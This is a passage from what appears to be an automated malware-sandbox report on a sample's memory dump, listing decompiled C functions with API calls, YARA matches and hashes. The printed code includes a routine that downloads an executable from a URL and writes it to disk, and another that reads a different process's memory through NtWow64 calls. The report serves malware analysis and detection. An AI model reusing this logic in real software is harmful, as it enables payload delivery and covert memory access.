                                                                                    • EnterCriticalSection.KERNEL32(00000054,?,00000000,?,?,?), ref: 04ED3D65
                                                                                    • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 04ED3D9D
                                                                                    • CreateIoCompletionPort.KERNEL32(?,?,00000000,00000000), ref: 04ED3DB9
                                                                                    • GetLastError.KERNEL32 ref: 04ED3DE0
                                                                                      • Part of subcall function 04EB7AB0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                      • Part of subcall function 04EB7AB0: EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                      • Part of subcall function 04EB7AB0: LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                      • Part of subcall function 04EB7AB0: SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                    • HeapFree.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04ED3EC1
                                                                                    • LeaveCriticalSection.KERNEL32(00000054), ref: 04ED3EC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterErrorHeapLastLeave$AllocCompletionCreateExceptionFreePortRaiseioctlsocket
                                                                                    • String ID:
                                                                                    • API String ID: 1309912178-0
                                                                                    • Opcode ID: 3f0d6f417f57c8925e4b1da09b45d384b6aea54bd33b5e577358cfe478af62cb
                                                                                    • Instruction ID: 0927e0a0c9a223ed4b7d1c4a6817d8d5e082bb873b5a2dacfaf72d2c9fab427d
                                                                                    • Opcode Fuzzy Hash: 3f0d6f417f57c8925e4b1da09b45d384b6aea54bd33b5e577358cfe478af62cb
                                                                                    • Instruction Fuzzy Hash: A6714A71A00209AFDB04DFA5C884BAEBBB9FF88305F104159ED15E7250EB71B955CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB5DA0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 206libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 36%
                                                                                    			E04EB5DA0(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v32;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v84;
				intOrPtr _v976;
				intOrPtr _v980;
				signed int _v988;
				char _v1100;
				intOrPtr _v1968;
				intOrPtr _v1972;
				char _v2004;
				intOrPtr _v2008;
				char _v2012;
				intOrPtr _v2016;
				signed int _t58;
				struct HINSTANCE__* _t60;
				struct HINSTANCE__* _t62;
				signed int _t83;
				intOrPtr* _t107;
				intOrPtr _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr _t132;
				void* _t133;
				signed int _t134;
				intOrPtr _t154;

				_t58 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t58 ^ _t134;
				_v2016 = __edx;
				_t129 = __ecx;
				_t60 = GetModuleHandleA("ntdll.dll");
				if(_t60 != 0) {
					L3:
					_t131 = GetProcAddress(_t60, "NtWow64QueryInformationProcess64");
				} else {
					_t60 = LoadLibraryA("ntdll.dll");
					if(_t60 != 0) {
						goto L3;
					} else {
						_t131 = 0;
					}
				}
				_t62 = GetModuleHandleA("ntdll.dll");
				if(_t62 != 0) {
					L7:
					_t107 = GetProcAddress(_t62, "NtWow64ReadVirtualMemory64");
				} else {
					_t62 = LoadLibraryA("ntdll.dll");
					if(_t62 != 0) {
						goto L7;
					} else {
						_t107 = 0;
					}
				}
				if(_t131 == 0 || _t107 == 0) {
					 *((intOrPtr*)(_t129 + 0x14)) = 7;
					 *((intOrPtr*)(_t129 + 0x10)) = 0;
					 *_t129 = 0;
					E04EB32A0(_t129, 0x4efb5d0);
					__eflags = _v8 ^ _t134;
					return E04ED572E(_v8 ^ _t134, 0);
				} else {
					E04EDDAD0(_t129,  &_v84, 0, 0x30);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x7d8], xmm0");
					_push( &_v2012);
					_push(0x30);
					_push( &_v84);
					_push(0);
					_push(_v2016);
					if( *_t131() < 0 || _v2012 != 0x30 || _v2008 != 0) {
						L24:
						E04EB31B0(_t129, _t129, 0x4efb5d0);
						__eflags = _v8 ^ _t134;
						return E04ED572E(_v8 ^ _t134);
					} else {
						_t132 = _v2016;
						_push( &_v2012);
						_push(0);
						_push(0x388);
						_push( &_v2004);
						_push(_v72);
						_push(_v76);
						_push(_t132);
						if( *_t107() < 0 || _v2012 != 0x388 || _v2008 != 0) {
							goto L24;
						} else {
							_push( &_v2012);
							_push(0);
							_push(0x3f8);
							_push( &_v1100);
							_push(_v1968);
							_push(_v1972);
							_push(_t132);
							if( *_t107() < 0 || _v2012 != 0x3f8) {
								goto L24;
							} else {
								_t154 = _v2008;
								if(_t154 != 0) {
									goto L24;
								} else {
									_t83 = (_v988 & 0x0000ffff) + 1;
									_t133 = E04ED5785( ~(_t154 > 0) | _t83 * 0x00000002, _t132, _t154);
									E04EDDAD0(_t129, _t133, 0, 2 + (_v988 & 0x0000ffff) * 2);
									asm("cdq");
									 *_t107(_v2016, _v980, _v976, _t133, _v988 & 0x0000ffff, _t83 * 2 >> 0x20,  &_v2012,  ~(_t154 > 0) | _t83 * 0x00000002);
									E04EB31B0( &_v32, _t129, _t133);
									E04ED573F(_t133);
									 *((intOrPtr*)(_t129 + 0x14)) = 7;
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									 *_t129 = 0;
									_t127 = _v12;
									if(_t127 >= 8) {
										 *_t129 = _v32;
										_v32 = 0;
									} else {
										_t101 = _v16 + 1;
										if(_v16 + 1 != 0) {
											E04EDCC90(_t129,  &_v32, _t101 + _t101);
											_t127 = _v12;
										}
									}
									 *((intOrPtr*)(_t129 + 0x10)) = _v16;
									 *((intOrPtr*)(_t129 + 0x14)) = _t127;
									_v12 = 7;
									_v16 = 0;
									_v32 = 0;
									E04EB3170( &_v32);
									return E04ED572E(_v8 ^ _t134);
								}
							}
						}
					}
				}
			}
































                                                                                    0x04eb5da9
                                                                                    0x04eb5db0
                                                                                    0x04eb5dbb
                                                                                    0x04eb5dc1
                                                                                    0x04eb5dc3
                                                                                    0x04eb5dd1
                                                                                    0x04eb5de2
                                                                                    0x04eb5dee
                                                                                    0x04eb5dd3
                                                                                    0x04eb5dd8
                                                                                    0x04eb5ddc
                                                                                    0x00000000
                                                                                    0x04eb5dde
                                                                                    0x04eb5dde
                                                                                    0x04eb5dde
                                                                                    0x04eb5ddc
                                                                                    0x04eb5df5
                                                                                    0x04eb5dfd
                                                                                    0x04eb5e0e
                                                                                    0x04eb5e1a
                                                                                    0x04eb5dff
                                                                                    0x04eb5e04
                                                                                    0x04eb5e08
                                                                                    0x00000000
                                                                                    0x04eb5e0a
                                                                                    0x04eb5e0a
                                                                                    0x04eb5e0a
                                                                                    0x04eb5e08
                                                                                    0x04eb5e1e
                                                                                    0x04eb6021
                                                                                    0x04eb6029
                                                                                    0x04eb6037
                                                                                    0x04eb603a
                                                                                    0x04eb6046
                                                                                    0x04eb6051
                                                                                    0x04eb5e2c
                                                                                    0x04eb5e34
                                                                                    0x04eb5e42
                                                                                    0x04eb5e45
                                                                                    0x04eb5e4d
                                                                                    0x04eb5e4e
                                                                                    0x04eb5e53
                                                                                    0x04eb5e54
                                                                                    0x04eb5e56
                                                                                    0x04eb5e60
                                                                                    0x04eb6000
                                                                                    0x04eb6007
                                                                                    0x04eb6014
                                                                                    0x04eb601e
                                                                                    0x04eb5e80
                                                                                    0x04eb5e80
                                                                                    0x04eb5e8c
                                                                                    0x04eb5e8d
                                                                                    0x04eb5e8f
                                                                                    0x04eb5e9a
                                                                                    0x04eb5e9b
                                                                                    0x04eb5e9e
                                                                                    0x04eb5ea1
                                                                                    0x04eb5ea6
                                                                                    0x00000000
                                                                                    0x04eb5ec9
                                                                                    0x04eb5ecf
                                                                                    0x04eb5ed0
                                                                                    0x04eb5ed2
                                                                                    0x04eb5edd
                                                                                    0x04eb5ede
                                                                                    0x04eb5ee4
                                                                                    0x04eb5eea
                                                                                    0x04eb5eef
                                                                                    0x00000000
                                                                                    0x04eb5f05
                                                                                    0x04eb5f05
                                                                                    0x04eb5f0c
                                                                                    0x00000000
                                                                                    0x04eb5f12
                                                                                    0x04eb5f1b
                                                                                    0x04eb5f30
                                                                                    0x04eb5f44
                                                                                    0x04eb5f5a
                                                                                    0x04eb5f70
                                                                                    0x04eb5f76
                                                                                    0x04eb5f7c
                                                                                    0x04eb5f83
                                                                                    0x04eb5f8a
                                                                                    0x04eb5f94
                                                                                    0x04eb5f97
                                                                                    0x04eb5f9d
                                                                                    0x04eb5fbf
                                                                                    0x04eb5fc1
                                                                                    0x04eb5f9f
                                                                                    0x04eb5fa2
                                                                                    0x04eb5fa5
                                                                                    0x04eb5faf
                                                                                    0x04eb5fb4
                                                                                    0x04eb5fb7
                                                                                    0x04eb5fa5
                                                                                    0x04eb5fcd
                                                                                    0x04eb5fd3
                                                                                    0x04eb5fd6
                                                                                    0x04eb5fdd
                                                                                    0x04eb5fe4
                                                                                    0x04eb5fe8
                                                                                    0x04eb5fff
                                                                                    0x04eb5fff
                                                                                    0x04eb5f0c
                                                                                    0x04eb5eef
                                                                                    0x04eb5ea6
                                                                                    0x04eb5e60

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04EB5DC3
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04EB5DD8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtWow64QueryInformationProcess64), ref: 04EB5DE8
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04EB5DF5
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04EB5E04
                                                                                    • GetProcAddress.KERNEL32(00000000,NtWow64ReadVirtualMemory64), ref: 04EB5E14
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                    • String ID: 0$NtWow64QueryInformationProcess64$NtWow64ReadVirtualMemory64$ntdll.dll
                                                                                    • API String ID: 310444273-3583746680
                                                                                    • Opcode ID: f283abb9b93ebe0642563a06a3b8e0b033e1db7ba797f535df5fa1ae1c0a14ba
                                                                                    • Instruction ID: 73f9c3fd9fb9aa4f16dfd412477f99cb9e6160366b184e3ce64e09881f3d627d
                                                                                    • Opcode Fuzzy Hash: f283abb9b93ebe0642563a06a3b8e0b033e1db7ba797f535df5fa1ae1c0a14ba
                                                                                    • Instruction Fuzzy Hash: F3618371E0021AABEF649F61DC41BFFB7B9EF44308F5011A6E909A6140DB78BA44CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC5710, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 93%
                                                                                    			E04EC5710(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
				signed int _v8;
				void _v1032;
				char _v1033;
				long _v1040;
				WCHAR* _v1044;
				long _v1048;
				void* _v1052;
				signed int _t21;
				void* _t45;
				void* _t53;
				void* _t54;
				struct _OVERLAPPED* _t56;
				signed int _t58;
				void* _t59;

				_t21 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t21 ^ _t58;
				_v1044 = __edx;
				_v1040 = 0;
				_t56 = 1;
				_v1048 = 0;
				_v1033 = 1;
				_t53 = InternetOpenW(L"Mozilla/4.0 (compatible)", 0, 0, 0, 0);
				_v1052 = _t53;
				if(_t53 == 0) {
					L3:
					return E04ED572E(_v8 ^ _t58);
				} else {
					_t45 = InternetOpenUrlW(_t53, __ecx, 0, 0, 0x80000000, 0);
					if(_t45 != 0) {
						_t54 = CreateFileW(_v1044, 0x40000000, 0, 0, 2, 0, 0);
						if(_t54 != 0xffffffff) {
							while(1) {
								E04EDDAD0(_t54,  &_v1032, 0, 0x400);
								_t59 = _t59 + 0xc;
								InternetReadFile(_t45,  &_v1032, 0x400,  &_v1040);
								if(_t56 != 0 && _v1032 != 0x5a4d) {
									break;
								}
								_t56 = 0;
								WriteFile(_t54,  &_v1032, _v1040,  &_v1048, 0);
								if(_v1040 > 0) {
									continue;
								} else {
								}
								L10:
								CloseHandle(_t54);
								goto L11;
							}
							_v1033 = 0;
							goto L10;
						}
						L11:
						InternetCloseHandle(_t45);
						InternetCloseHandle(_v1052);
						return E04ED572E(_v8 ^ _t58);
					} else {
						InternetCloseHandle(_t53);
						goto L3;
					}
				}
			}

















                                                                                    0x04ec5719
                                                                                    0x04ec5720
                                                                                    0x04ec5733
                                                                                    0x04ec573b
                                                                                    0x04ec5745
                                                                                    0x04ec574a
                                                                                    0x04ec5754
                                                                                    0x04ec5761
                                                                                    0x04ec5763
                                                                                    0x04ec576b
                                                                                    0x04ec578f
                                                                                    0x04ec579f
                                                                                    0x04ec576d
                                                                                    0x04ec5780
                                                                                    0x04ec5784
                                                                                    0x04ec57bb
                                                                                    0x04ec57c0
                                                                                    0x04ec57c2
                                                                                    0x04ec57d0
                                                                                    0x04ec57d5
                                                                                    0x04ec57ec
                                                                                    0x04ec57f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec5804
                                                                                    0x04ec581c
                                                                                    0x04ec5828
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec582a
                                                                                    0x04ec5833
                                                                                    0x04ec5834
                                                                                    0x00000000
                                                                                    0x04ec5834
                                                                                    0x04ec582c
                                                                                    0x00000000
                                                                                    0x04ec582c
                                                                                    0x04ec583a
                                                                                    0x04ec5841
                                                                                    0x04ec5849
                                                                                    0x04ec5861
                                                                                    0x04ec5786
                                                                                    0x04ec5787
                                                                                    0x00000000
                                                                                    0x04ec5787
                                                                                    0x04ec5784

                                                                                    APIs
                                                                                    • InternetOpenW.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 04EC575B
                                                                                    • InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 04EC577A
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 04EC5787
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04EC57B5
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04EC57EC
                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 04EC581C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC5834
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 04EC5841
                                                                                    • InternetCloseHandle.WININET(?), ref: 04EC5849
                                                                                    Strings
                                                                                    • Mozilla/4.0 (compatible), xrefs: 04EC572E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandle$File$Open$CreateReadWrite
                                                                                    • String ID: Mozilla/4.0 (compatible)
                                                                                    • API String ID: 769820311-4055971283
                                                                                    • Opcode ID: bfe12017a83d1b562a5443655cf0667efb6c5bd3b517932df06b07a83deb3f21
                                                                                    • Instruction ID: 61a1c22e62f0fd9adafe2e518a65013c1fa794fd9c5a6be339669485659620d4
                                                                                    • Opcode Fuzzy Hash: bfe12017a83d1b562a5443655cf0667efb6c5bd3b517932df06b07a83deb3f21
                                                                                    • Instruction Fuzzy Hash: 1931C8B1A40228BBEB309B54DC45FAEB778DB84B05F1041E9FB09B61C0D6747D868F98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB6520, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 48libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 54%
                                                                                    			E04EB6520() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t15;

				_t1 = LoadLibraryA("User32.dll");
				_t15 = _t1;
				if(_t15 != 0) {
					_t2 = GetProcAddress(_t15, "SetProcessDpiAwarenessContext");
					if(_t2 == 0) {
						L4:
						_t3 = LoadLibraryA("Shcore.dll");
						if(_t3 == 0) {
							L8:
							if(GetProcAddress(_t15, "SetProcessDPIAware") != 0) {
								goto __eax;
							}
							return 0;
						} else {
							_t6 = GetProcAddress(_t3, "SetProcessDpiAwareness");
							if(_t6 == 0) {
								goto L8;
							} else {
								_push(2);
								if( *_t6() == 0) {
									goto L8;
								} else {
									goto L7;
								}
							}
						}
					} else {
						_push(0xfffffffd);
						if( *_t2() != 0) {
							L7:
							return 1;
						} else {
							goto L4;
						}
					}
				} else {
					return _t1;
				}
			}








                                                                                    0x04eb6526
                                                                                    0x04eb652c
                                                                                    0x04eb6530
                                                                                    0x04eb6541
                                                                                    0x04eb6545
                                                                                    0x04eb654f
                                                                                    0x04eb6554
                                                                                    0x04eb655c
                                                                                    0x04eb657a
                                                                                    0x04eb6584
                                                                                    0x04eb6588
                                                                                    0x04eb6588
                                                                                    0x04eb658e
                                                                                    0x04eb655e
                                                                                    0x04eb6564
                                                                                    0x04eb6568
                                                                                    0x00000000
                                                                                    0x04eb656a
                                                                                    0x04eb656a
                                                                                    0x04eb6570
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb6570
                                                                                    0x04eb6568
                                                                                    0x04eb6547
                                                                                    0x04eb6547
                                                                                    0x04eb654d
                                                                                    0x04eb6572
                                                                                    0x04eb6579
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb654d
                                                                                    0x04eb6533
                                                                                    0x04eb6533
                                                                                    0x04eb6533

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(User32.dll,?,04EB65D3), ref: 04EB6526
                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 04EB6541
                                                                                    • LoadLibraryA.KERNEL32(Shcore.dll,?,?,04EB65D3), ref: 04EB6554
                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 04EB6564
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: SetProcessDPIAware$SetProcessDpiAwareness$SetProcessDpiAwarenessContext$Shcore.dll$User32.dll
                                                                                    • API String ID: 2574300362-2252252969
                                                                                    • Opcode ID: 22f2c17acdf8fd9ef5998d8bb2840c0761e986bf74c3117eb1510f5024c42468
                                                                                    • Instruction ID: c9a9b0e2fd373ccb3a786e28e459d2264b3dd08b1f17d235c58062216f6a42bf
                                                                                    • Opcode Fuzzy Hash: 22f2c17acdf8fd9ef5998d8bb2840c0761e986bf74c3117eb1510f5024c42468
                                                                                    • Instruction Fuzzy Hash: 41F02B33B42617125B21A17E3C00FFB17487FD0A693259621F996D508CDE40F65244F2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED1A20, Relevance: 16.6, APIs: 11, Instructions: 137COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 96%
                                                                                    			E04ED1A20(intOrPtr __ecx) {
				intOrPtr _v8;
				long _v12;
				intOrPtr _v16;
				void* __esi;
				void* _t44;
				long _t45;
				short* _t51;
				void* _t54;
				signed int _t57;
				intOrPtr _t63;
				intOrPtr _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr _t80;
				signed int _t82;
				struct _CRITICAL_SECTION* _t93;

				_t63 = __ecx;
				_v16 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x24)) != 0) {
					_t93 = __ecx + 0x28;
					EnterCriticalSection(_t93);
					__eflags =  *(_t63 + 0x24);
					if( *(_t63 + 0x24) != 0) {
						_t82 = timeGetTime();
						_v12 = _t82;
						_v8 =  *((intOrPtr*)(_t63 + 0x18));
						__eflags = _t82;
						if(_t82 == 0) {
							_v12 = timeGetTime();
						}
						_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t63 + 4)))) + 0x54))();
						__eflags = _v12 - _v8 - _t44;
						if(_v12 - _v8 <= _t44) {
							_t69 =  *((intOrPtr*)(_t63 + 0x10));
							_t45 = _t82;
							_v8 = _t69;
							__eflags = _t82;
							if(_t82 == 0) {
								_t45 = timeGetTime();
								_t69 = _v8;
							}
							__eflags = _t45 - _t69;
							if(_t45 - _t69 >= 0) {
								_t80 =  *((intOrPtr*)(_t63 + 0x40));
								 *(_t63 + 0x14) =  *(_t63 + 0x14) + 1;
								_t70 =  *(_t63 + 0x14);
								__eflags =  *(_t80 + 0x50) * _t70 - 0x7d0;
								if(__eflags >= 0) {
									_t71 = 0x7d0;
								} else {
									_t21 = _t70 + 1; // 0x1
									_t57 = _t21;
									 *(_t63 + 0x14) = _t57;
									_t71 =  *(_t80 + 0x50) * _t57;
								}
								 *((intOrPtr*)(_t63 + 0x10)) = _t71 + _t82;
								_push(0xc);
								_v8 =  *((intOrPtr*)(_t63 + 0x20));
								_t51 = E04ED5785(_t71, _t93, __eflags);
								_v12 = _t51;
								__eflags =  *(_t63 + 0x24) - 2;
								 *_t51 = 0xbb4f;
								 *((char*)(_t51 + 3)) = 0xbb00 |  *(_t63 + 0x24) == 0x00000002;
								 *((char*)(_t51 + 2)) = 1;
								 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t63 + 0x1c));
								 *((intOrPtr*)(_t51 + 8)) = _v8;
								LeaveCriticalSection(_t93);
								asm("sbb ecx, ecx");
								__eflags =  ~( *(_v16 + 8)) &  *(_v16 + 8) + 0x00000004;
								_t54 = E04ECE580( ~( *(_v16 + 8)) &  *(_v16 + 8) + 0x00000004, _v12, 0xc, 0);
								E04ED573F(_v12);
								return _t54;
							} else {
								LeaveCriticalSection(_t93);
								return 1;
							}
						} else {
							SetLastError(0x5b4);
							__eflags = 0;
							LeaveCriticalSection(_t93);
							return 0;
						}
					} else {
						SetLastError(0x139f);
						__eflags = 0;
						LeaveCriticalSection(_t93);
						return 0;
					}
				} else {
					SetLastError(0x139f);
					return 0;
				}
			}



















                                                                                    0x04ed1a27
                                                                                    0x04ed1a29
                                                                                    0x04ed1a30
                                                                                    0x04ed1a46
                                                                                    0x04ed1a4a
                                                                                    0x04ed1a50
                                                                                    0x04ed1a54
                                                                                    0x04ed1a79
                                                                                    0x04ed1a7e
                                                                                    0x04ed1a81
                                                                                    0x04ed1a84
                                                                                    0x04ed1a86
                                                                                    0x04ed1a8e
                                                                                    0x04ed1a8e
                                                                                    0x04ed1a96
                                                                                    0x04ed1a9f
                                                                                    0x04ed1aa1
                                                                                    0x04ed1ac0
                                                                                    0x04ed1ac3
                                                                                    0x04ed1ac5
                                                                                    0x04ed1ac8
                                                                                    0x04ed1aca
                                                                                    0x04ed1acc
                                                                                    0x04ed1ad2
                                                                                    0x04ed1ad2
                                                                                    0x04ed1ad5
                                                                                    0x04ed1ad7
                                                                                    0x04ed1aee
                                                                                    0x04ed1af1
                                                                                    0x04ed1af4
                                                                                    0x04ed1afd
                                                                                    0x04ed1b02
                                                                                    0x04ed1b12
                                                                                    0x04ed1b04
                                                                                    0x04ed1b04
                                                                                    0x04ed1b04
                                                                                    0x04ed1b07
                                                                                    0x04ed1b0d
                                                                                    0x04ed1b0d
                                                                                    0x04ed1b1d
                                                                                    0x04ed1b26
                                                                                    0x04ed1b28
                                                                                    0x04ed1b2b
                                                                                    0x04ed1b33
                                                                                    0x04ed1b3b
                                                                                    0x04ed1b3e
                                                                                    0x04ed1b44
                                                                                    0x04ed1b4b
                                                                                    0x04ed1b4f
                                                                                    0x04ed1b52
                                                                                    0x04ed1b55
                                                                                    0x04ed1b6e
                                                                                    0x04ed1b70
                                                                                    0x04ed1b72
                                                                                    0x04ed1b7a
                                                                                    0x04ed1b8a
                                                                                    0x04ed1ad9
                                                                                    0x04ed1adf
                                                                                    0x04ed1aed
                                                                                    0x04ed1aed
                                                                                    0x04ed1aa3
                                                                                    0x04ed1aa8
                                                                                    0x04ed1aaf
                                                                                    0x04ed1ab1
                                                                                    0x04ed1abf
                                                                                    0x04ed1abf
                                                                                    0x04ed1a56
                                                                                    0x04ed1a5b
                                                                                    0x04ed1a62
                                                                                    0x04ed1a64
                                                                                    0x04ed1a72
                                                                                    0x04ed1a72
                                                                                    0x04ed1a32
                                                                                    0x04ed1a37
                                                                                    0x04ed1a43
                                                                                    0x04ed1a43

                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED1A37
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?), ref: 04ED1A4A
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED1A5B
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED1A64
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 2124651672-0
                                                                                    • Opcode ID: e22a4e535c7315c5de3966c99bcbefb5a8f0327a3cba41aad50ac1ebcbb954f4
                                                                                    • Instruction ID: 4072e38d3dce406bd6c925834e6e510c22a826c42c23927b013b006ad0b53bfe
                                                                                    • Opcode Fuzzy Hash: e22a4e535c7315c5de3966c99bcbefb5a8f0327a3cba41aad50ac1ebcbb954f4
                                                                                    • Instruction Fuzzy Hash: D641B176B00104DFCB04CFA9E484AA9BBB5FF88316F1541AAED0ACB345DB35E901CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBDEF0, Relevance: 16.6, APIs: 11, Instructions: 123memorysleepCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 54%
                                                                                    			E04EBDEF0(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t21;
				void* _t22;
				int _t27;
				int _t34;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				void* _t48;
				void* _t52;
				void* _t58;
				void* _t66;
				void* _t67;
				void* _t70;
				void* _t74;
				intOrPtr* _t78;
				void* _t79;

				_push(__ecx);
				_push(_t67);
				_t58 = _a8;
				_t39 = __ecx;
				_v8 = __ecx;
				if(_t58 != 0) {
					_t78 = _a4 + 8;
					_t66 = (_t58 - 1 >> 4) + 1;
					do {
						E04EBDE40(__ecx,  *((intOrPtr*)(_t78 - 8)),  *((intOrPtr*)(_t78 - 4)),  *_t78,  *((intOrPtr*)(_t78 + 4)));
						_t79 = _t79 + 8;
						_t78 = _t78 + 0x10;
						_t66 = _t66 - 1;
					} while (_t66 != 0);
				}
				Sleep(0x64);
				_t21 =  *((intOrPtr*)(_t39 + 0xc));
				if(_t21 != 2) {
					__eflags = _t21 - 3;
					if(__eflags != 0) {
						_t22 = E04EBDB70(_t39, __eflags);
						goto L10;
					} else {
						_t22 = E04EBD960(_t58, _t67);
						_a8 = _t22;
						__eflags = _t22;
						if(_t22 == 0) {
							goto L10;
						} else {
							_t16 = LocalSize(_t22) + 1; // 0x1
							_t41 = LocalAlloc(0x40, _t16);
							_t70 = _a8;
							_t18 = _t41 + 1; // 0x1
							_t48 = _t18;
							 *_t41 = 0x8e;
							E04EDDC90(_t48, _t70, _t23);
							LocalFree(_t70);
							_t27 = LocalSize(_t41);
							_push(_t48);
							_push(0x3f);
							_push(_t27);
							_push(_t41);
							E04EB1C60( *((intOrPtr*)(_v8 + 4)));
							return LocalFree(_t41);
						}
					}
				} else {
					_t22 = E04EBD550(_t58, _t67);
					_a8 = _t22;
					if(_t22 == 0) {
						L10:
						return _t22;
					} else {
						_t10 = LocalSize(_t22) + 1; // 0x1
						_t43 = LocalAlloc(0x40, _t10);
						_t74 = _a8;
						_t12 = _t43 + 1; // 0x1
						_t52 = _t12;
						 *_t43 = 0x8e;
						E04EDDC90(_t52, _t74, _t30);
						LocalFree(_t74);
						_t34 = LocalSize(_t43);
						_push(_t52);
						_push(0x3f);
						_push(_t34);
						_push(_t43);
						E04EB1C60( *((intOrPtr*)(_v8 + 4)));
						return LocalFree(_t43);
					}
				}
			}























                                                                                    0x04ebdef3
                                                                                    0x04ebdef5
                                                                                    0x04ebdef7
                                                                                    0x04ebdefa
                                                                                    0x04ebdefc
                                                                                    0x04ebdf01
                                                                                    0x04ebdf0a
                                                                                    0x04ebdf0d
                                                                                    0x04ebdf10
                                                                                    0x04ebdf1b
                                                                                    0x04ebdf20
                                                                                    0x04ebdf23
                                                                                    0x04ebdf26
                                                                                    0x04ebdf26
                                                                                    0x04ebdf10
                                                                                    0x04ebdf2d
                                                                                    0x04ebdf33
                                                                                    0x04ebdf39
                                                                                    0x04ebdfa0
                                                                                    0x04ebdfa3
